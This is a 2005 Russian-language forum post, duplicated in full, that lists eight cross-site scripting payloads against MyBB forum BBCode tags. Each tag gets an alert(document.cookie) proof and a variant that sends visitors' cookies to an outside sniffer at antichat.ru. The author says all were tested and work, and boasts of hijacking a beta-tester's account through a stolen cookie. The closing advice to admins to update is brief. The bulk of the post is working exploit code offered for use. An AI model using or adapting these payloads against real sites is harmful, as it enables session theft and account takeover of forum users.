KEZ
30.03.2005, 14:45
Уязвимости MyBB (XSS). Заключение.
Недавно разработчики не безизвестного форума наконец поняли что у их форум не так хорошо защищен... Как только я сделал alert с куки какому-то бета-тестеру (Dale), он сразу сделал скриншот этого алерта, изза чего был расшифрован его хеш и получен доступ с его ника.
Я заметил, что после того как на оффсайте MyBB (http://www.mybboard.com/community) появилось security-обновление админа таких форумов не спешат ставить это обновление.
На оффсайте больше не работают не вложеные теги, не кавычки в тегах, однако на всех других сайтах все осталось по прежнему.
Я хорошо поискал и вот что я нашел XSS в каждом теге (кроме ), причем наверняка есть ещё XSS, но следующего достаточно. 8 штук. (влож. теги, кавычки в тегах).
Это как бы заключение темы о уязвимостях MyBB.
(Примеры - первый показывает alert с cookies домена, второй - направляет cookies домена на сниффер antichat'a - это практическое использование)
-----------------------
1. EMAIL+URL
1. s[/URL]] ([URL= s=`)`xss="alert(document.cookie);this.xss=null" style=top:expression(eval(this.xss));
2. s[/URL]] ([URL= s=`)`xss="i=new Image(); i.src='http://antichat.ru/cgi-bin/s.jpg?'+document.cookie;this.sss=null" style=top:expression(eval(this.xss));
2. IMG+URL
1. http://aaaaaaa (s=`)`xss="alert(document.cookie);this.xss=null" style=top:expression(eval(this.xss));
2. http://aaaaaaa (s=`)`xss="i=new Image(); i.src='http://antichat.ru/cgi-bin/s.jpg?'+document.cookie;this.sss=null" style=top:expression(eval(this.xss));
3. SIZE, кавычки
1. a`xss="alert(document.cookie);this.xss=null" style=top:expression(eval(this.xss));
2. a`xss="i=new Image(); i.src='http://antichat.ru/cgi-bin/s.jpg?'+document.cookie;this.sss=null" style=top:expression(eval(this.xss));
4. SIZE+URL
1. aaa`xss="alert(document.cookie);this.xss=null" style=top:expression(eval(this.xss));
2. aaa`xss="i=new Image(); i.src='http://antichat.ru/cgi-bin/s.jpg?'+document.cookie;this.sss=null" style=top:expression(eval(this.xss));
5. FONT, кавычки
1. aaaaa`xss="alert(document.cookie);this.xss=null" style=top:expression(eval(this.xss));
2. aaaaa`xss="i=new Image(); i.src='http://antichat.ru/cgi-bin/s.jpg?'+document.cookie;this.sss=null" style=top:expression(eval(this.xss));
6. FONT+URL
1. aaa` xss="alert(document.cookie);this.xss=null" style=top:expression(eval(this.xss));
2. aaa`xss="i=new Image(); i.src='http://antichat.ru/cgi-bin/s.jpg?'+document.cookie;this.sss=null" style=top:expression(eval(this.xss));
7 ALIGN, кавычки
1. a`xss="alert(document.cookie);this.xss=null" style=top:expression(eval(this.xss));
2. a`xss="i=new Image(); i.src='http://antichat.ru/cgi-bin/s.jpg?'+document.cookie;this.sss=null" style=top:expression(eval(this.xss));
8. ALIGN+URL
1. a`xss="alert(document.cookie);this.xss=null" style=top:expression(eval(this.xss));
2. a`xss="i=new Image(); i.src='http://antichat.ru/cgi-bin/s.jpg?'+document.cookie;this.sss=null" style=top:expression(eval(this.xss));
-----------------------
Все эти эксплойты проверялись один за другим и все они работают, по крайней мере сейчас.
Не факт, что есть и другие уязвимости (например тег ALIGN, спареный с другими тегами), но писать все бессмысленно, такие XSS можно составлять пачками.
SQL инжекций найжено не было (на оффсайте), а вот скрипты стандартного архива MyBB (на моем localhoste) вообще не проверяют данные, передаваемые в mysql_query(). На оффсайте об этом позаботились.
[color=red]Вывод: MyBB содержит больше XSS чем любой другой известный форум. Всем админам MyBB надо срочно обновить свои форумы до последней версии (см. официальный сайт)
KEZ.
Недавно разработчики не безизвестного форума наконец поняли что у их форум не так хорошо защищен... Как только я сделал alert с куки какому-то бета-тестеру (Dale), он сразу сделал скриншот этого алерта, изза чего был расшифрован его хеш и получен доступ с его ника.
Я заметил, что после того как на оффсайте MyBB (http://www.mybboard.com/community) появилось security-обновление админа таких форумов не спешат ставить это обновление.
На оффсайте больше не работают не вложеные теги, не кавычки в тегах, однако на всех других сайтах все осталось по прежнему.
Я хорошо поискал и вот что я нашел XSS в каждом теге (кроме ), причем наверняка есть ещё XSS, но следующего достаточно. 8 штук. (влож. теги, кавычки в тегах).
Это как бы заключение темы о уязвимостях MyBB.
(Примеры - первый показывает alert с cookies домена, второй - направляет cookies домена на сниффер antichat'a - это практическое использование)
-----------------------
1. EMAIL+URL
1. s[/URL]] ([URL= s=`)`xss="alert(document.cookie);this.xss=null" style=top:expression(eval(this.xss));
2. s[/URL]] ([URL= s=`)`xss="i=new Image(); i.src='http://antichat.ru/cgi-bin/s.jpg?'+document.cookie;this.sss=null" style=top:expression(eval(this.xss));
2. IMG+URL
1. http://aaaaaaa (s=`)`xss="alert(document.cookie);this.xss=null" style=top:expression(eval(this.xss));
2. http://aaaaaaa (s=`)`xss="i=new Image(); i.src='http://antichat.ru/cgi-bin/s.jpg?'+document.cookie;this.sss=null" style=top:expression(eval(this.xss));
3. SIZE, кавычки
1. a`xss="alert(document.cookie);this.xss=null" style=top:expression(eval(this.xss));
2. a`xss="i=new Image(); i.src='http://antichat.ru/cgi-bin/s.jpg?'+document.cookie;this.sss=null" style=top:expression(eval(this.xss));
4. SIZE+URL
1. aaa`xss="alert(document.cookie);this.xss=null" style=top:expression(eval(this.xss));
2. aaa`xss="i=new Image(); i.src='http://antichat.ru/cgi-bin/s.jpg?'+document.cookie;this.sss=null" style=top:expression(eval(this.xss));
5. FONT, кавычки
1. aaaaa`xss="alert(document.cookie);this.xss=null" style=top:expression(eval(this.xss));
2. aaaaa`xss="i=new Image(); i.src='http://antichat.ru/cgi-bin/s.jpg?'+document.cookie;this.sss=null" style=top:expression(eval(this.xss));
6. FONT+URL
1. aaa` xss="alert(document.cookie);this.xss=null" style=top:expression(eval(this.xss));
2. aaa`xss="i=new Image(); i.src='http://antichat.ru/cgi-bin/s.jpg?'+document.cookie;this.sss=null" style=top:expression(eval(this.xss));
7 ALIGN, кавычки
1. a`xss="alert(document.cookie);this.xss=null" style=top:expression(eval(this.xss));
2. a`xss="i=new Image(); i.src='http://antichat.ru/cgi-bin/s.jpg?'+document.cookie;this.sss=null" style=top:expression(eval(this.xss));
8. ALIGN+URL
1. a`xss="alert(document.cookie);this.xss=null" style=top:expression(eval(this.xss));
2. a`xss="i=new Image(); i.src='http://antichat.ru/cgi-bin/s.jpg?'+document.cookie;this.sss=null" style=top:expression(eval(this.xss));
-----------------------
Все эти эксплойты проверялись один за другим и все они работают, по крайней мере сейчас.
Не факт, что есть и другие уязвимости (например тег ALIGN, спареный с другими тегами), но писать все бессмысленно, такие XSS можно составлять пачками.
SQL инжекций найжено не было (на оффсайте), а вот скрипты стандартного архива MyBB (на моем localhoste) вообще не проверяют данные, передаваемые в mysql_query(). На оффсайте об этом позаботились.
[color=red]Вывод: MyBB содержит больше XSS чем любой другой известный форум. Всем админам MyBB надо срочно обновить свои форумы до последней версии (см. официальный сайт)
KEZ.